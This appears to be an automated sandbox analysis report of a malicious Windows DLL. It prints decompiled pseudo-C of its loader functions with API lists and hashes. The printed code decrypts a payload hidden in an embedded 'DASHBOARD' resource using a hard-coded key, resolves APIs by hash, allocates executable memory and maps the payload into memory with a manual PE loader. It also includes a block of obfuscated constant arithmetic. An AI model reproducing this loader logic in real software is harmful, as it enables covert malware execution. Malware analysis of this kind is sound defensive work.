				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0x4cc2cb6b
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}
















































                                                                                                                                  0x100125c0
                                                                                                                                  0x100125c0
                                                                                                                                  0x100125c0
                                                                                                                                  0x100125c6
                                                                                                                                  0x100125cd
                                                                                                                                  0x100125d3
                                                                                                                                  0x100125d9
                                                                                                                                  0x100125df
                                                                                                                                  0x100125e2
                                                                                                                                  0x100125eb
                                                                                                                                  0x100125f0
                                                                                                                                  0x100125f7
                                                                                                                                  0x100125fe
                                                                                                                                  0x10012605
                                                                                                                                  0x1001260c
                                                                                                                                  0x10012613
                                                                                                                                  0x10012618
                                                                                                                                  0x1001261a
                                                                                                                                  0x1001265a
                                                                                                                                  0x1001265f
                                                                                                                                  0x10012667
                                                                                                                                  0x1001261c
                                                                                                                                  0x1001261c
                                                                                                                                  0x10012626
                                                                                                                                  0x10012630
                                                                                                                                  0x1001263a
                                                                                                                                  0x10012644
                                                                                                                                  0x1001264e
                                                                                                                                  0x1001266e
                                                                                                                                  0x10012675
                                                                                                                                  0x1001268a
                                                                                                                                  0x10012690
                                                                                                                                  0x100126a1
                                                                                                                                  0x100126b2
                                                                                                                                  0x100126b5
                                                                                                                                  0x100126bb
                                                                                                                                  0x100126c1
                                                                                                                                  0x100126c7
                                                                                                                                  0x100126cd
                                                                                                                                  0x100126d3
                                                                                                                                  0x100126d9
                                                                                                                                  0x100126df
                                                                                                                                  0x100126e5
                                                                                                                                  0x100126eb
                                                                                                                                  0x100126f1
                                                                                                                                  0x100126f7
                                                                                                                                  0x100126fd
                                                                                                                                  0x10012703
                                                                                                                                  0x10012709
                                                                                                                                  0x1001270f
                                                                                                                                  0x10012715
                                                                                                                                  0x1001271b
                                                                                                                                  0x10012721
                                                                                                                                  0x10012727
                                                                                                                                  0x1001272d
                                                                                                                                  0x10012733
                                                                                                                                  0x10012739
                                                                                                                                  0x1001273f
                                                                                                                                  0x10012746
                                                                                                                                  0x10012748
                                                                                                                                  0x1001274c
                                                                                                                                  0x10012751
                                                                                                                                  0x10012754
                                                                                                                                  0x10012754
                                                                                                                                  0x10012757
                                                                                                                                  0x10012763
                                                                                                                                  0x10012777
                                                                                                                                  0x1001278d
                                                                                                                                  0x10012792
                                                                                                                                  0x10012799
                                                                                                                                  0x100127c4
                                                                                                                                  0x100127d7
                                                                                                                                  0x1001279b
                                                                                                                                  0x100127ac
                                                                                                                                  0x100127b2
                                                                                                                                  0x100127b2
                                                                                                                                  0x100127e6
                                                                                                                                  0x100127ee
                                                                                                                                  0x100127fd
                                                                                                                                  0x1001280b
                                                                                                                                  0x1001281b
                                                                                                                                  0x1001281f
                                                                                                                                  0x10012834
                                                                                                                                  0x10012839
                                                                                                                                  0x1001283e
                                                                                                                                  0x1001283e
                                                                                                                                  0x10012850

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                  • _printf.LIBCMT ref: 1001265F
                                                                                                                                  • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                  • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                  • _malloc.LIBCMT ref: 100127F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                  • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                  • API String ID: 572389289-2839844625
                                                                                                                                  • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                  • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 2de991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}





























                                                                                                                                  0x10002286
                                                                                                                                  0x10002289
                                                                                                                                  0x10002290
                                                                                                                                  0x100022a7
                                                                                                                                  0x100022b3
                                                                                                                                  0x100022c1
                                                                                                                                  0x100022d8
                                                                                                                                  0x100022f0
                                                                                                                                  0x100022ff
                                                                                                                                  0x10002302
                                                                                                                                  0x1000230e
                                                                                                                                  0x1000232f
                                                                                                                                  0x1000234c
                                                                                                                                  0x1000236e
                                                                                                                                  0x10002377
                                                                                                                                  0x1000237a
                                                                                                                                  0x10002395
                                                                                                                                  0x100023a8
                                                                                                                                  0x100023c4
                                                                                                                                  0x100023aa
                                                                                                                                  0x100023b3
                                                                                                                                  0x100023b3
                                                                                                                                  0x100023cd
                                                                                                                                  0x100023d2
                                                                                                                                  0x100023d2
                                                                                                                                  0x10002389
                                                                                                                                  0x10002392
                                                                                                                                  0x10002392
                                                                                                                                  0x100023db
                                                                                                                                  0x100023ea
                                                                                                                                  0x100023f8
                                                                                                                                  0x10002401
                                                                                                                                  0x10002412
                                                                                                                                  0x10002438
                                                                                                                                  0x1000243e
                                                                                                                                  0x10002445
                                                                                                                                  0x10002472
                                                                                                                                  0x10002483
                                                                                                                                  0x1000248a
                                                                                                                                  0x100024b2
                                                                                                                                  0x100024c4
                                                                                                                                  0x100024cb
                                                                                                                                  0x100024d4
                                                                                                                                  0x100024dd
                                                                                                                                  0x100024e6
                                                                                                                                  0x100024ef
                                                                                                                                  0x100024f8
                                                                                                                                  0x10002510
                                                                                                                                  0x1000252e
                                                                                                                                  0x10002534
                                                                                                                                  0x10002546
                                                                                                                                  0x10002554
                                                                                                                                  0x1000255a
                                                                                                                                  0x10002564
                                                                                                                                  0x1000257a
                                                                                                                                  0x10002581
                                                                                                                                  0x10002598
                                                                                                                                  0x1000259b
                                                                                                                                  0x1000259e
                                                                                                                                  0x100025bb
                                                                                                                                  0x100025a0
                                                                                                                                  0x100025b3
                                                                                                                                  0x100025b3
                                                                                                                                  0x100025d0
                                                                                                                                  0x100025e3
                                                                                                                                  0x100025ea
                                                                                                                                  0x10002604
                                                                                                                                  0x10002616
                                                                                                                                  0x10002680
                                                                                                                                  0x10002687
                                                                                                                                  0x00000000
                                                                                                                                  0x10002687
                                                                                                                                  0x1000261f
                                                                                                                                  0x10002678
                                                                                                                                  0x1000267b
                                                                                                                                  0x00000000
                                                                                                                                  0x1000267b
                                                                                                                                  0x1000262c
                                                                                                                                  0x1000262f
                                                                                                                                  0x10002635
                                                                                                                                  0x1000263c
                                                                                                                                  0x10002646
                                                                                                                                  0x1000264d
                                                                                                                                  0x10002661
                                                                                                                                  0x00000000
                                                                                                                                  0x10002661
                                                                                                                                  0x10002654
                                                                                                                                  0x1000268c
                                                                                                                                  0x10002693
                                                                                                                                  0x00000000
                                                                                                                                  0x10002698
                                                                                                                                  0x00000000
                                                                                                                                  0x10002606
                                                                                                                                  0x00000000
                                                                                                                                  0x100025ec
                                                                                                                                  0x00000000
                                                                                                                                  0x100025d2
                                                                                                                                  0x00000000
                                                                                                                                  0x10002583
                                                                                                                                  0x00000000
                                                                                                                                  0x10002512
                                                                                                                                  0x10002497
                                                                                                                                  0x1000249f
                                                                                                                                  0x00000000
                                                                                                                                  0x100024a5
                                                                                                                                  0x10002454
                                                                                                                                  0x1000245a
                                                                                                                                  0x10002461
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x10002465
                                                                                                                                  0x00000000
                                                                                                                                  0x1000246b
                                                                                                                                  0x10002419
                                                                                                                                  0x00000000
                                                                                                                                  0x1000241f
                                                                                                                                  0x10002353
                                                                                                                                  0x00000000
                                                                                                                                  0x10002359
                                                                                                                                  0x10002336
                                                                                                                                  0x00000000
                                                                                                                                  0x1000233c
                                                                                                                                  0x10002315
                                                                                                                                  0x00000000
                                                                                                                                  0x1000231b
                                                                                                                                  0x00000000
                                                                                                                                  0x100022f2
                                                                                                                                  0x100022c8
                                                                                                                                  0x00000000
                                                                                                                                  0x100022ce
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                  • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                  • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DF8FD Relevance: 11.6, Strings: 9, Instructions: 353COMMONCrypto
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 148 2df8fd-2dfddc 149 2dfde0-2dfde6 148->149 150 2dfdec-2dfdf2 149->150 151 2dffa3-2dffbe call 2d4b61 149->151 152 2dfdf8-2dfdfe 150->152 153 2dffd1-2dffe9 call 2dab87 150->153 164 2dffc3-2dffc9 151->164 156 2dff5e-2dff64 152->156 157 2dfe04-2dfe0a 152->157 159 2dffee-2dfff3 153->159 160 2dff99-2dff9e 156->160 161 2dff66-2dff6a 156->161 162 2dff49-2dff59 call 2df899 157->162 163 2dfe10-2dfe16 157->163 167 2dfff4-2e0000 159->167 160->149 168 2dff6c-2dff73 161->168 169 2dff91-2dff97 161->169 162->149 170 2dfe8f-2dfeae call 2e46bb 163->170 171 2dfe18-2dfe1e 163->171 164->149 165 2dffcf 164->165 165->167 173 2dff81-2dff8a 168->173 169->160 169->161 176 2dfeb3-2dff44 call 2eda22 call 2edcf7 call 2d47ce call 2da8b0 170->176 171->164 175 2dfe24-2dfe5e call 2edcf7 call 2db23c 171->175 177 2dff8c-2dff8e 173->177 178 2dff75-2dff79 173->178 185 2dfe63-2dfe8a call 2da8b0 175->185 176->149 177->169 178->177 181 2dff7b-2dff7e 178->181 181->173 185->164
                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E002DF8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
